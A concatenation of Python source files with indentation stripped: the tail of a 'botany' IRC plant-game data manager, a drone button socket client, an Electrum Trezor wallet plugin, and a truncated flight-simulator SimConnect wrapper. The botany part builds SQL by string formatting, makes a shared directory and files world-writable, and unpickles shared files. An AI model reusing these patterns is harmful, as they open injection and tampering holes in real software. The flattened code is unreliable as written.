adjusted_sleep_time = 1 / (1 + generation_bonus)
time.sleep(adjusted_sleep_time)
class DataManager(object):
# handles user data, puts a .botany dir in user's home dir (OSX/Linux)
# handles shared data with sqlite db
# TODO: .dat save should only happen on mutation, water, death, exit,
# harvest, otherwise
# data hasn't changed...
# can write json whenever bc this isn't ever read for data within botany
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
game_dir = os.path.dirname(os.path.realpath(__file__))
this_user = getpass.getuser()
savefile_name = this_user + '_plant.dat'
savefile_path = os.path.join(botany_dir, savefile_name)
#set this.savefile_path to guest_garden path
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
garden_json_path = os.path.join(game_dir, 'garden_file.json')
harvest_file_path = os.path.join(botany_dir, 'harvest_file.dat')
harvest_json_path = os.path.join(botany_dir, 'harvest_file.json')
def __init__(self):
self.this_user = getpass.getuser()
# check if instance is already running
# check for .botany dir in home
try:
os.makedirs(self.botany_dir)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
self.savefile_name = self.this_user + '_plant.dat'
def check_plant(self):
# check for existing save file
if os.path.isfile(self.savefile_path):
return True
else:
return False
def start_threads(self,this_plant):
# creates threads to save files every minute
death_check_thread = threading.Thread(target=self.death_check_update, args=(this_plant,))
death_check_thread.daemon = True
death_check_thread.start()
autosave_thread = threading.Thread(target=self.autosave, args=(this_plant,))
autosave_thread.daemon = True
autosave_thread.start()
def death_check_update(self,this_plant):
# .1 second updates and lock to minimize race condition
while True:
is_dead = this_plant.dead_check()
if is_dead:
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
self.harvest_plant(this_plant)
this_plant.unlock_new_creation()
time.sleep(.1)
def autosave(self, this_plant):
# running on thread, saves plant every 5s TODO: this is unnecessary
# and breaks shit probably
file_update_count = 0
while True:
file_update_count += 1
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
if file_update_count == 12:
# only update garden json every 60s
self.update_garden_json()
time.sleep(5)
file_update_count %= 12
def load_plant(self):
# load savefile
with open(self.savefile_path, 'rb') as f:
this_plant = pickle.load(f)
# migrate data structure to create data for empty/nonexistent plant
# properties
this_plant.migrate_properties()
# get status since last login
is_dead = this_plant.dead_check()
is_watered = this_plant.water_check()
if not is_dead:
if is_watered:
time_delta_last = int(time.time()) - this_plant.last_time
ticks_to_add = min(time_delta_last, 24*3600)
this_plant.time_delta_watered = 0
self.last_water_gain = time.time()
else:
ticks_to_add = 0
this_plant.ticks += ticks_to_add * (0.2 * (this_plant.generation - 1) + 1)
return this_plant
def plant_age_convert(self,this_plant):
# human-readable plant age
age_seconds = int(time.time()) - this_plant.start_time
days, age_seconds = divmod(age_seconds, 24 * 60 * 60)
hours, age_seconds = divmod(age_seconds, 60 * 60)
minutes, age_seconds = divmod(age_seconds, 60)
age_formatted = ("%dd:%dh:%dm:%ds" % (days, hours, minutes, age_seconds))
return age_formatted
def init_database(self):
# check if dir exists, create sqlite directory and set OS permissions to 777
sqlite_dir_path = os.path.join(self.game_dir,'sqlite')
if not os.path.exists(sqlite_dir_path):
os.makedirs(sqlite_dir_path)
os.chmod(sqlite_dir_path, 0777)
conn = sqlite3.connect(self.garden_db_path)
init_table_string = """CREATE TABLE IF NOT EXISTS garden (
plant_id tinytext PRIMARY KEY,
owner text,
description text,
age text,
score integer,
is_dead numeric
)"""
c = conn.cursor()
c.execute(init_table_string)
conn.close()
# init only, creates and sets permissions for garden db and json
if os.stat(self.garden_db_path).st_uid == os.getuid():
os.chmod(self.garden_db_path, 0666)
open(self.garden_json_path, 'a').close()
os.chmod(self.garden_json_path, 0666)
def migrate_database(self):
conn = sqlite3.connect(self.garden_db_path)
migrate_table_string = """CREATE TABLE IF NOT EXISTS visitors (
id integer PRIMARY KEY,
garden_name text,
visitor_name text,
weekly_visits integer
)"""
c = conn.cursor()
c.execute(migrate_table_string)
conn.close()
return True
def update_garden_db(self, this_plant):
# insert or update this plant id's entry in DB
# TODO: make sure other instances of user are deleted
# Could create a clean db function
self.init_database()
self.migrate_database()
age_formatted = self.plant_age_convert(this_plant)
conn = sqlite3.connect(self.garden_db_path)
c = conn.cursor()
# try to insert or replace
update_query = """INSERT OR REPLACE INTO garden (
plant_id, owner, description, age, score, is_dead
) VALUES (
'{pid}', '{pown}', '{pdes}', '{page}', {psco}, {pdead}
)
""".format(pid = this_plant.plant_id,
pown = this_plant.owner,
pdes = this_plant.parse_plant(),
page = age_formatted,
psco = str(this_plant.ticks),
pdead = int(this_plant.dead))
c.execute(update_query)
conn.commit()
conn.close()
def retrieve_garden_from_db(self):
# Builds a dict of dicts from garden sqlite db
garden_dict = {}
conn = sqlite3.connect(self.garden_db_path)
# Need to allow write permissions by others
conn.row_factory = sqlite3.Row
c = conn.cursor()
c.execute('SELECT * FROM garden ORDER BY owner')
tuple_list = c.fetchall()
conn.close()
# Building dict from table rows
for item in tuple_list:
garden_dict[item[0]] = {
"owner":item[1],
"description":item[2],
"age":item[3],
"score":item[4],
"dead":item[5],
}
return garden_dict
def update_garden_json(self):
this_garden = self.retrieve_garden_from_db()
with open(self.garden_json_path, 'w') as outfile:
json.dump(this_garden, outfile)
pass
def save_plant(self, this_plant):
# create savefile
this_plant.last_time = int(time.time())
temp_path = self.savefile_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_plant, f, protocol=2)
os.rename(temp_path, self.savefile_path)
def data_write_json(self, this_plant):
# create personal json file for user to use outside of the game (website?)
json_file = os.path.join(self.botany_dir,self.this_user + '_plant_data.json')
# also updates age
age_formatted = self.plant_age_convert(this_plant)
plant_info = {
"owner":this_plant.owner,
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
"is_dead":this_plant.dead,
"last_watered":this_plant.watered_timestamp,
"file_name":this_plant.file_name,
"stage": this_plant.stage_list[this_plant.stage],
"generation": this_plant.generation,
}
if this_plant.stage >= 3:
plant_info["rarity"] = this_plant.rarity_list[this_plant.rarity]
if this_plant.mutation != 0:
plant_info["mutation"] = this_plant.mutation_list[this_plant.mutation]
if this_plant.stage >= 4:
plant_info["color"] = this_plant.color_list[this_plant.color]
if this_plant.stage >= 2:
plant_info["species"] = this_plant.species_list[this_plant.species]
with open(json_file, 'w') as outfile:
json.dump(plant_info, outfile)
def harvest_plant(self, this_plant):
# TODO: plant history feature - could just use a sqlite query to retrieve all of user's dead plants
# harvest is a dict of dicts
# harvest contains one entry for each plant id
age_formatted = self.plant_age_convert(this_plant)
this_plant_id = this_plant.plant_id
plant_info = {
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
}
if os.path.isfile(self.harvest_file_path):
# harvest file exists: load data
with open(self.harvest_file_path, 'rb') as f:
this_harvest = pickle.load(f)
new_file_check = False
else:
this_harvest = {}
new_file_check = True
this_harvest[this_plant_id] = plant_info
# dump harvest file
temp_path = self.harvest_file_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_harvest, f, protocol=2)
os.rename(temp_path, self.harvest_file_path)
# dump json file
with open(self.harvest_json_path, 'w') as outfile:
json.dump(this_harvest, outfile)
return new_file_check
if __name__ == '__main__':
import sys
if len(sys.argv) != 4:
print("Usage: botany.py <server[:port]> <owner> <nickname>")
sys.exit(1)
s = sys.argv[1].split(":", 1)
server = s[0]
if len(s) == 2:
try:
port = int(s[1])
except ValueError:
print("Error: Erroneous port.")
sys.exit(1)
else:
port = 6667
channel = sys.argv[2]
nickname = sys.argv[3]
print("initialising plant data")
my_data = DataManager()
# if plant save file exists
if my_data.check_plant():
my_plant = my_data.load_plant()
# otherwise create new plant
else:
my_plant = Plant(my_data.savefile_path)
my_data.data_write_json(my_plant)
# my_plant is either a fresh plant or an existing plant at this point
my_plant.start_life()
my_data.start_threads(my_plant)
print("initialising irc connection")
print("connecting to %s:%d as %s, with owner %s" % (server, port, nickname, channel))
bot = BotanyBot(nickname, channel, server, port, my_plant,my_data)
bot.start()
|
btn_client.py
|
#!/usr/bin/env python
import socket
import struct
import threading
from sololink import btn_msg
HOST = "10.1.1.1"
PORT = 5016
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "connecting to", HOST, ":", PORT, "...",
s.connect((HOST, PORT))
print "OK"
def in_thread(s):
while True:
msg = btn_msg.recv(s)
if msg is None:
print "received \"None\""
break
elif len(msg) != 4:
print "received funky message: ", str(msg)
else:
print "received:", msg[0], \
btn_msg.ButtonName[msg[1]], \
btn_msg.EventName[msg[2]], msg[3]
if btn_msg.msg_buf_long != 0:
print "btn_msg.msg_buf_long=%d!" % btn_msg.msg_buf_long
btn_msg.msg_buf_long = 0
if btn_msg.msg_buf_short != 0:
print "btn_msg.msg_buf_short=%d!" % btn_msg.msg_buf_short
btn_msg.msg_buf_short = 0
in_id = threading.Thread(target=in_thread, args=(s,))
in_id.daemon = True
in_id.start()
format = 1
while True:
desc = raw_input()
# allow changing which message goes out
if desc == "1":
format = 1
continue;
elif desc == "2":
format = 2
continue;
if format == 1:
button_id = btn_msg.ButtonA
shot_id = 0
btn_msg.sendArtooString(s, button_id, shot_id, desc + "\0")
elif format == 2:
btn_msg.sendShotString(s, desc + "\0")
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device, runs_in_hwd_thread
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException,
get_xpubs_and_der_suffixes_from_txinout)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
Capability, BackupType, RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
from trezorlib.client import PASSPHRASE_ON_DEVICE
TREZORLIB = True
except Exception as e:
if not (isinstance(e, ModuleNotFoundError) and e.name == 'trezorlib'):
_logger.exception('error importing trezor plugin deps')
TREZORLIB = False
class _EnumMissing:
def __init__(self):
self.counter = 0
self.values = {}
def __getattr__(self, key):
if key not in self.values:
self.values[key] = self.counter
self.counter += 1
return self.values[key]
Capability = _EnumMissing()
BackupType = _EnumMissing()
RecoveryDeviceType = _EnumMissing()
PASSPHRASE_ON_DEVICE = object()
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
plugin: 'TrezorPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None:
raise UserFacingException(_('Missing previous tx.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
backup_type: int = BackupType.Bip39
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://pypi.org/project/trezor/'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 12, 0)
maximum_library = (0, 13)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
self._is_bridge_available = None
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
@runs_in_hwd_thread
def is_bridge_available(self) -> bool:
# Testing whether the Bridge is available can take several seconds
# (when it is not), as it is slow to timeout, hence we cache it.
if self._is_bridge_available is None:
try:
call_bridge("enumerate")
except Exception:
self._is_bridge_available = False
# never again try with Bridge due to slow timeout
BridgeTransport.ENABLED = False
else:
self._is_bridge_available = True
return self._is_bridge_available
@runs_in_hwd_thread
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
if self.is_bridge_available():
devices = BridgeTransport.enumerate()
else:
devices = trezorlib.transport.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
@runs_in_hwd_thread
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['TrezorClientBase']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Avian"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.").format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RecoveryDeviceType.ScrambledWords:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 20: 128, 24: 256, 33: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
backup_type=settings.backup_type,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RecoveryDeviceType.Matrix:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub('m', 'standard', creating=is_creating_wallet))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
prev_tx = {bfh(txhash): self.electrum_tx_to_txtype(tx) for txhash, tx in prev_tx.items()}
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'TrezorKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_trezor_input_script_type(txin.script_type)
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n = full_path
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'TrezorKeyStore'):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
t.inputs = self.tx_inputs(tx)
t.bin_outputs = [
TxOutputBinType(amount=o.value, script_pubkey=o.scriptpubkey)
for o in tx.outputs()
]
return t
|
SimConnect.py
|
from ctypes import *
from ctypes.wintypes import *
import logging
import time
from .Enum import *
from .Constants import *
from .Attributes import *
import os
import threading
_library_path = os.path.abspath(__file__).replace(".py", ".dll")
LOGGER = logging.getLogger(__name__)
def millis():
return int(round(time.time() * 1000))
class SimConnect:
def IsHR(self, hr, value):
_hr = ctypes.HRESULT(hr)
return ctypes.c_ulong(_hr.value).value == value
def handle_id_event(self, event):
uEventID = event.uEventID
if uEventID == self.dll.EventID.EVENT_SIM_START:
LOGGER.info("SIM START")
self.running = True
if uEventID == self.dll.EventID.EVENT_SIM_STOP:
LOGGER.info("SIM Stop")
self.running = False
# Unknow whay not reciving
if uEventID == self.dll.EventID.EVENT_SIM_PAUSED:
LOGGER.info("SIM Paused")
self.paused = True
if uEventID == self.dll.EventID.EVENT_SIM_UNPAUSED:
LOGGER.info("SIM Unpaused")
self.paused = False
def handle_simobject_event(self, ObjData):
dwRequestID = ObjData.dwRequestID
if dwRequestID in self.Requests:
_request = self.Requests[dwRequestID]
rtype = _request.definitions[0][1].decode()
if 'string' in rtype.lower():
pS = cast(ObjData.dwData, c_char_p)
_request.outData = pS.value
else:
_request.outData = cast(
ObjData.dwData, POINTER(c_double * len(_request.definitions))
).contents[0]
else:
LOGGER.warn("Event ID: %d Not Handled." % (dwRequestID))
def handle_exception_event(self, exc):
_exception = SIMCONNECT_EXCEPTION(exc.dwException).name
_unsendid = exc.UNKNOWN_SENDID
_sendid = exc.dwSendID
_unindex = exc.UNKNOWN_INDEX
_index = exc.dwIndex
# request exceptions
for _reqin in self.Requests:
_request = self.Requests[_reqin]
if _request.LastID == _unsendid:
LOGGER.warn("%s: in %s" % (_exception, _request.definitions[0]))
return
LOGGER.warn(_exception)
def handle_state_event(self, pData):
print("I:", pData.dwInteger, "F:", pData.fFloat, "S:", pData.szString)
# TODO: update callbackfunction to expand functions.
def my_dispatch_proc(self, pData, cbData, pContext):
# print("my_dispatch_proc")
dwID = pData.contents.dwID
if dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_EVENT:
evt = cast(pData, POINTER(SIMCONNECT_RECV_EVENT)).contents
self.handle_id_event(evt)
elif dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_SYSTEM_STATE:
state = cast(pData, POINTER(SIMCONNECT_RECV_SYSTEM_STATE)).contents
self.handle_state_event(state)
elif dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_SIMOBJECT_DATA_BYTYPE:
pObjData = cast(
pData, POINTER(SIMCONNECT_RECV_SIMOBJECT_DATA_BYTYPE)
).contents
self.handle_simobject_event(pObjData)
elif dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_OPEN:
LOGGER.info("SIM OPEN")
self.ok = True
elif dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_EXCEPTION:
exc = cast(pData, POINTER(SIMCONNECT_RECV_EXCEPTION)).contents
self.handle_exception_event(exc)
elif (dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_AIRPORT_LIST) or (
dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_WAYPOINT_LIST) or (
dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_NDB_LIST) or (
dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_VOR_LIST):
pObjData = cast(
pData, POINTER(SIMCONNECT_RECV_FACILITIES_LIST)
).contents
dwRequestID = pObjData.dwRequestID
for _facilitie in self.Facilities:
if dwRequestID == _facilitie.REQUEST_ID.value:
_facilitie.parent.dump(pData)
_facilitie.dump(pData)
elif dwID == SIMCONNECT_RECV_ID.SIMCONNECT_RECV_ID_QUIT:
self.quit = 1
else:
LOGGER.debug("Received:", SIMCONNECT_RECV_ID(dwID))
return
def __init__(self, auto_connect=True, library_path=_library_path):
self.Requests = {}
self.Facilities = []
self.dll = SimConnectDll(library_path)
self.hSimConnect = HANDLE()
self.quit = 0
self.ok = False
self.running = False
self.paused = False
self.DEFINITION_POS = None
self.DEFINITION_WAYPOINT = None
self.my_dispatch_proc_rd = self.dll.DispatchProc(self.my_dispatch_proc)
if auto_connect:
self.connect()
def connect(self):
try:
err = self.dll.Open(
byref(self.hSimConnect), LPCSTR(b"Request Data"), None, 0, 0, 0
)
if self.IsHR(err, 0):
LOGGER.debug("Connected to Flight Simulator!")
# Request an event when the simulation starts
# The user is in control of the aircraft
self.dll.SubscribeToSystemEvent(
self.hSimConnect, self.dll.EventID.EVENT_SIM_START, b"SimStart"
)
# The user is navigating the UI.
self.dll.SubscribeToSystemEvent(
self.hSimConnect, self.dll.EventID.EVENT_SIM_STOP, b"SimStop"
)
# Request a notification when the flight is paused
self.dll.SubscribeToSystemEvent(
self.hSimConnect, self.dll.EventID.EVENT_SIM_PAUSED, b"Paused"
)
# Request a notification when the flight is un-paused.
self.dll.SubscribeToSystemEvent(
self.hSimConnect, self.dll.EventID.EVENT_SIM_UNPAUSED, b"Unpaused"
)
self.timerThread = threading.Thread(target=self._run)
self.timerThread.daemon = True
self.timerThread.start()
while self.ok is False:
pass
except OSError:
LOGGER.debug("Did not find Flight Simulator running.")
raise ConnectionError("Did not find Flight Simulator running.")
def _run(self):
while self.quit == 0:
self.dll.CallDispatch(self.hSimConnect, self.my_dispatch_proc_rd, None)
time.sleep(.001)
def exit(self):
self.quit = 1
self.timerThread.join()
self.dll.Close(self.hSimConnect)
def map_to_sim_event(self, name):
for m in self.dll.EventID:
if name.decode() == m.name:
LOGGER.debug("Already have event: ", m)
return m
names = [m.name for m in self.dll.EventID] + [name.decode()]
self.dll.EventID = Enum(self.dll.EventID.__name__, names)
evnt = list(self.dll.EventID)[-1]
err = self.dll.MapClientEventToSimEvent(self.hSimConnect, evnt.value, name)
if self.IsHR(err, 0):
return evnt
else:
LOGGER.error("Error: MapToSimEvent")
return None
def add_to_notification_group(self, group, evnt, bMaskable=False):
self.dll.AddClientEventToNotificationGroup(
self.hSimConnect, group, evnt, bMaskable
)
def request_data(self, _Request):
_Request.outData = None
self.dll.RequestDataOnSimObjectType(
self.hSimConnect,
_Request.DATA_REQUEST_ID.value,
_Request.DATA_DEFINITION_ID.value,
0,
SIMCONNECT_SIMOBJECT_TYPE.SIMCONNECT_SIMOBJECT_TYPE_USER,
)
temp = DWORD(0)
